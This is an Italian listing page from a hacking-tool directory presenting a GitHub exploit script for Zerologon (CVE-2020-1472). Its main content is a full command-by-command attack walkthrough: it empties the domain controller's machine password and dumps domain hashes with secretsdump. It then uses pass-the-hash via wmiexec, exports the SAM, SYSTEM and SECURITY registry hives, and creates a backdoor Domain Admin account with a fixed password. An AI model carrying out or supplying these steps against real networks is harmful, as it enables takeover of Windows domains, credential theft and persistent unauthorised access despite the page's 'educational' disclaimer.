Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
zerologon — script zerologon per sfruttare CVE-2020-1472 CVSS 10/10 | Kitploit
Strumenti/GitHubGitHub/wrathfuldiety/zerologon
Password CrackingEscalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingApprendimento e Formazione
GitHubwrathfuldiety/zerologon

zerologon

script zerologon per sfruttare CVE-2020-1472 CVSS 10/10

Vedi Repository
245 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

zerologon

script zerologon per sfruttare CVE-2020-1472 CVSS 10/10 Codice exploit basato su https://www.secura.com/blog/zero-logon e https://github.com/SecuraBV/CVE-2020-1472. Ricerca e scanner originali di Secura, modifiche di RiskSense Inc. https://github.com/risksense/zerologon

Per sfruttare la vulnerabilità, rimuovi tutte le installazioni precedenti di Impacket e installa Impacket dal commit https://github.com/SecureAuthCorp/impacket/commit/b867b21 o successivo.

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

Poi, esegui:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Se ha successo, potrai poi eseguire:

sudo secretsdump.py -just-dc domain/hostname\$@ip

premendo "Enter" alla richiesta della password potrai passare, il che dovrebbe darti l'hash di Domain Admin. Dopo averlo ottenuto, usa wmiexec.py verso il DC di destinazione con una credenziale ricavata dal secretsdump

wmiexec.py domain/Administrator@ip -hashes hash

ed esegui

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

E poi puoi creare un nuovo account Admin per sicurezza,

net user myadmin Hello1234 /ADD /DOMAIN

e aggiungi il nuovo account al gruppo Domain Admins per ottenere tutti i privilegi,

net group "Domain Admins" myadmin /ADD /DOMAIN

e probabilmente esegui exit ora da C:>

Poi puoi eseguire

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

E questo dovrebbe mostrarti l'hash NT originale dell'account macchina. Puoi quindi reinstallare l'hash originale dell'account macchina nel dominio con

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Reinstallare l'hash originale è necessario affinché il DC continui a funzionare normalmente.

E solo per assicurarti che il processo di ripristino abbia funzionato,

sudo secretsdump.py -just-dc domain/hostname\$@ip

e premendo "Enter" alla richiesta della password non funzionerà più.

E qui abbiamo finito.

Buona caccia.

DICHIARAZIONE DI NON RESPONSABILITÀ: Questo è puramente a scopo educativo, non sarò ritenuto responsabile per alcuna azione o per le loro conseguenze ENTRARE ILLEGALMENTE NEI DISPOSITIVI ALTRUI È ILLEGALE ED È PUNITO DALLA LEGGE.

Scarica lo strumento